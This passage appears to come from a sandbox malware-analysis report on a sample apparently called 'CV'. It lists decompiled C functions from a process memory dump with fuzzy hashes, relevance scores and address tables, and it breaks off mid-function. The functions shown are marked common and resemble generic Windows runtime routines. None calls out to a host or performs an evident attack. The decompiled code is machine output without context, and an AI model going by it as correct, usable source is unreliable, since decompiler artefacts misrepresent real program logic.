Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd54a9c7d0c728571efc3fb01027ffe1c4de3b8b127803828b7edd7144f7ea37
Instruction ID: b743c826dbd8e61ab694dce422b6ea943cfb9dc55818d8374eae32627c2dce68
Opcode Fuzzy Hash: bd54a9c7d0c728571efc3fb01027ffe1c4de3b8b127803828b7edd7144f7ea37
Instruction Fuzzy Hash: EA219F72510645AFC725DF69D890E6BBBADEF48740F10066DE70AC7690D634E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0126AE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0126AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01267D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01267D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01267D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01267D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E012C7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0126ae78
0x0126ae7c
0x0126ae7e
0x0126ae81
0x0126ae86
0x0126ae8d
0x012b2691
0x0126ae93
0x0126ae93
0x0126ae93
0x0126ae98
0x0126ae9d
0x012b26a2
0x012b26b4
0x012b26a4
0x012b26ad
0x012b26ad
0x012b26b9
0x00000000
0x012b26bb
0x00000000
0x012b26bb
0x0126aea3
0x0126aea3
0x0126aea3
0x0126aeaa
0x012b26c0
0x012b26c9
0x012b26c9
0x0126aeb3
0x012b26d4
0x012b26e1
0x00000000
0x00000000
0x012b26e7
0x012b26ee
0x012b26f0
0x012b26f9
0x012b26f9
0x012b2702
0x012b2708
0x012b2708
0x012b270b
0x012b270f
0x012b2711
0x012b2711
0x012b2725
0x012b2725
0x00000000
0x0126aeb9
0x0126aeb9
0x0126aebf
0x0126aebf
0x0126aeb3

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: d1a752706481e3fb7e9345c808b35a3f4bc521aa4ff8a355f8131a6518b2c34f
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 1A21D432631682DFE7169B29C984B7577E8EF54784F1904A0DE049B692D774EC80C690

Uniqueness

Uniqueness Score: -1.00%

Function 0127FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0127FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E012576E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0127fd9b
0x0127fda0
0x0127fda1
0x0127fdab
0x0127fdad
0x0127fdb0
0x0127fdb8
0x0127fe0f
0x0127fde6
0x0127fde9
0x0127fdec
0x012bc0c0
0x0127fdfe
0x0127fe06
0x0127fe06
0x012bc0c8
0x0127fe2d
0x0127fe2d
0x00000000
0x0127fe2d
0x012bc0d1
0x012bc0e0
0x012bc0e5
0x012bc0e5
0x012bc0e8
0x00000000
0x012bc0e8
0x0127fdf4
0x00000000
0x00000000
0x0127fdf6
0x0127fdfa
0x0127fe1a
0x0127fe1f
0x0127fe1f
0x0127fdfc
0x00000000
0x0127fdfc
0x0127fdcc
0x0127fdd0
0x0127fe26
0x00000000
0x0127fe26
0x0127fdd8
0x0127fddb
0x0127fddd
0x0127fde0
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: a53d38b76fb27f8ee9276a503867b69f01e60234328b4042969e0e708a6309ed
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 2A21AC72628A42DFD735CF0DC640E63B7E5EB95B10F21847EEA6587611D7309C00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0127B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0127B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01262280(_t12, 0x1338608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E012800C2(0x1338608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0127b395
0x0127b3a2
0x0127b3a5
0x0127b3aa
0x0127b3b2
0x0127b3ba
0x0127b3bd
0x0127b3c0
0x0127b3c4
0x0127b3c9
0x012ba3e9
0x012ba3ed
0x012ba3f0
0x012ba3ff
0x012ba403
0x012ba409
0x00000000
0x00000000
0x012ba40b
0x012ba40b
0x012ba40f
0x012ba415
0x012ba423
0x012ba423
0x012ba415
0x0127b3d1
0x0127b3e8
0x0127b3e8
0x0127b3d9

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 333e9a8b07e806c998513dd0680c9d15525ef93ef6ae2e2decfe6dfbfe03fe9b
Instruction ID: c6ca16c04eff568253ade381051b92c8706f8a7aa9e2f092482b42e67d8206fb
Opcode Fuzzy Hash: 333e9a8b07e806c998513dd0680c9d15525ef93ef6ae2e2decfe6dfbfe03fe9b
Instruction Fuzzy Hash: 49116B373361119BCB299B198D81A6B725AEBC5370B240129EE16C73C0CA799C46C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 01249240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01249240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x131f708);
				E0129D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E012895D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E012895D0();
				_t33 =  *0x13384c4; // 0x0
				L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x13384c4; // 0x0
				L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x13384c4; // 0x0
				E01262280(L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x13386b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E012895D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E012895D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01249325();
					_t50 =  *0x13384c4; // 0x0
					return E0129D0D1(L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x01249240
0x01249242
0x01249247
0x0124924c
0x0124924e
0x01249255
0x01249257
0x0124925a
0x0124925f
0x0124925f
0x01249266
0x01249271
0x01249276
0x01249279
0x0124927e
0x01249295
0x0124929a
0x012492b1
0x012492b6
0x012492d7
0x012492dc
0x012492e0
0x012492e6
0x012492e8
0x012492ee
0x01249332
0x01249333
0x01249337
0x01249338
0x0124933a
0x0124933a
0x0124933d
0x01249342
0x01249342
0x01249345
0x01249349
0x0124934e
0x01249352
0x01249357
0x012492f4
0x012492f4
0x012492f6
0x012492f9
0x01249300
0x01249306
0x01249324
0x01249324

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 221a5ceafb07eef507bbd0e1f005ab8c9000e1f5bd9029d32dabf81727270f67
Instruction ID: 73620cb420013d0aa1aa426ae320048813b0d1ad627c4d3dc619edd99be8926c
Opcode Fuzzy Hash: 221a5ceafb07eef507bbd0e1f005ab8c9000e1f5bd9029d32dabf81727270f67
Instruction Fuzzy Hash: B4214131061601DFCB26EF68DA40F26B7F9FF18708F14456CE14A97AA1C739E981DB44

Uniqueness

Uniqueness Score: -1.00%

Function 012D4257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E012D4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x13208d0);
				E0129D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E012D41E8(__ebx, __edi, __ecx, _t39);
				E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x13387e4;
					_t18 =  *0x13387e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1335cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x13387e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x13387e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01247055(_t31 + 0xfffffff8);
								_t24 =  *0x13387e0; // 0x0
								_t18 = _t24 - 1;
								 *0x13387e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1335cd0;
				if( *0x1335cd0 <= 0) {
					L01247055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x13387e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x13387e8 = _t30;
						 *0x13387e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0129D0D1(L012D4320());
			}

0x012d4257
0x012d4257
0x012d4257
0x012d4259
0x012d425e
0x012d4263
0x012d4265
0x012d4273
0x012d4278
0x012d427c
0x012d427f
0x012d4281
0x012d4287
0x012d42d7
0x012d42d7
0x012d42da
0x012d428d
0x012d428d
0x012d428f
0x012d4292
0x012d4297
0x012d429c
0x012d42a0
0x012d42a6
0x012d42a8
0x012d42ae
0x012d42b3
0x00000000
0x012d42ba
0x012d42ba
0x012d42bf
0x012d42c5
0x012d42ca
0x012d42cf
0x012d42d0
0x00000000
0x012d42d0
0x012d42b3
0x00000000
0x012d42a6
0x012d429c
0x012d42dc
0x012d42dc
0x012d42e3
0x012d4309
0x012d42e5
0x012d42e5
0x012d42e8
0x012d42ee
0x012d42f0
0x00000000
0x012d42f2
0x012d42f2
0x012d42f4
0x012d42f7
0x012d42f9
0x012d4300
0x012d4300
0x012d42f0
0x012d430e
0x012d431f

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 992833a18ebc02911f084a32e32e7b17b8d97f7f2e41f1f307f2c7070edbbe63
Instruction ID: d5aced4a05e5a15cf756a49ffa521241a06f4001a0c86d00a451e2d86d02dd0a
Opcode Fuzzy Hash: 992833a18ebc02911f084a32e32e7b17b8d97f7f2e41f1f307f2c7070edbbe63
Instruction Fuzzy Hash: E0219070521742CFCB26EF68D044624BBF6FF85354F2082AED2158BA65DB31E552CF84

Uniqueness

Uniqueness Score: -1.00%

Function 01272397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E01272397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x133848c != 0) {
					L0126FAD0(0x1338610);
					if( *0x133848c == 0) {
						E0126FA00(0x1338610, _t19, _t27, 0x1338610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01272581(0x1338610, 0x12250a0, _t26, _t27, _t28);
						E0126FA00(0x1338610, 0x12250a0, _t27, 0x1338610);
					}
				} else {
					L1:
					_t11 =  *0x1338614; // 0x0
					if(_t11 == 0) {
						_t11 = E01284886(0x1221088, 1, 0x1338614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01272581(0x1338610, (_t11 << 4) + 0x1225070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x012723b0
0x012723b6
0x01272409
0x01272415
0x012b5ae9
0x00000000
0x0127241b
0x0127241b
0x0127241d
0x01272427
0x0127242e
0x01272430
0x01272430
0x012723b8
0x012723b8
0x012723b8
0x012723bf
0x012723fc
0x012723fc
0x012723c1
0x012723c3
0x012723d0
0x012723d8
0x012723d8
0x012723dc
0x012723de
0x012723e1
0x012723e1
0x012723ec

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50b0428473ba40aada1079fc2338cd7f1eca62459de3bc502b195f331a83ef02
Instruction ID: e46ba07766e4eb430492b68dd93cc69aad6f13e9ff456ea615bd1a68965cf7a5
Opcode Fuzzy Hash: 50b0428473ba40aada1079fc2338cd7f1eca62459de3bc502b195f331a83ef02
Instruction Fuzzy Hash: 85112B31720352A7E730AB29AC91F2AB6DCFBA4720F14856AF702A7280C5B4D8418758

Uniqueness

Uniqueness Score: -1.00%

Function 012C46A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E012C46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0128F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0127D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L012677F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x012c46b7
0x012c46ba
0x012c46c5
0x012c46c8
0x012c46d0
0x012c46d4
0x012c46e6
0x012c46e9
0x012c46f4
0x012c46ff
0x012c4705
0x012c4706
0x012c470c
0x012c4713
0x012c471b
0x012c4723
0x012c4725
0x012c46d6
0x012c46d9
0x012c46db
0x012c46db
0x012c4732

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 749cedfdeb81714b8b1a8e9bf33a4491acdacb01cd88d2a6567cd54c31d332ba
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 29110272514248BFC705AF5C98808BEBBB9EF95300F10806EF98487351DA318D55C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 012837F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E012837F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01262280(_t6, 0x1338550);
				}
				_t29 = E0128387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0125FFB0(0x1338550, _t27, 0x1338550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x012837fa
0x012837fc
0x01283805
0x01283808
0x01283808
0x01283814
0x01283818
0x01283846
0x01283848
0x0128384b
0x0128384b
0x01283852
0x00000000
0x01283854
0x01283856
0x00000000
0x00000000
0x01283863
0x00000000
0x01283863
0x0128381a
0x0128381a
0x0128381f
0x0128386e
0x0128386e
0x01283871
0x01283873
0x01283873
0x01283868
0x00000000
0x01283868
0x01283821
0x01283826
0x00000000
0x00000000
0x01283828
0x0128382a
0x01283841
0x00000000
0x01283841

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d225ff420e0e6d57b578b6a7c268716d87085f65e586ea9cbd04537efe1d1230
Instruction ID: a9460f4c2c1aec57ad3506bba8cb0752537a9f45f19e392fde87b5e07d763cba
Opcode Fuzzy Hash: d225ff420e0e6d57b578b6a7c268716d87085f65e586ea9cbd04537efe1d1230
Instruction Fuzzy Hash: 4301D6B29336129BC337EB1DD940E26BBAAFF85F60B154069EA458B296D734C801C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 0127002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0127002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01267D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01267D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01267D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01267D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x01270032
0x01270037
0x01270043
0x012b4b3a
0x01270049
0x01270049
0x01270049
0x0127004e
0x01270053
0x012b4b48
0x012b4b5a
0x012b4b4a
0x012b4b53
0x012b4b53
0x012b4b5f
0x00000000
0x012b4b61
0x00000000
0x012b4b61
0x01270059
0x01270059
0x01270060
0x012b4b6f
0x012b4b6f
0x01270069
0x012b4b83
0x00000000
0x00000000
0x012b4b90
0x012b4b9b
0x012b4b9b
0x012b4ba4
0x00000000
0x00000000
0x012b4baa
0x00000000
0x0127006f
0x0127006f
0x00000000
0x0127006f
0x01270069

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 2fcbd30a7734bf078e6748cb527f777f0562c43768185f99636ecf769ccfd4b8
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: C111E532A316C28FE723A76CC5D5B767798AB527E8F0900A0EF0587693E778D841C254

Uniqueness

Uniqueness Score: -1.00%

Function 0125766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0125766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0127F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
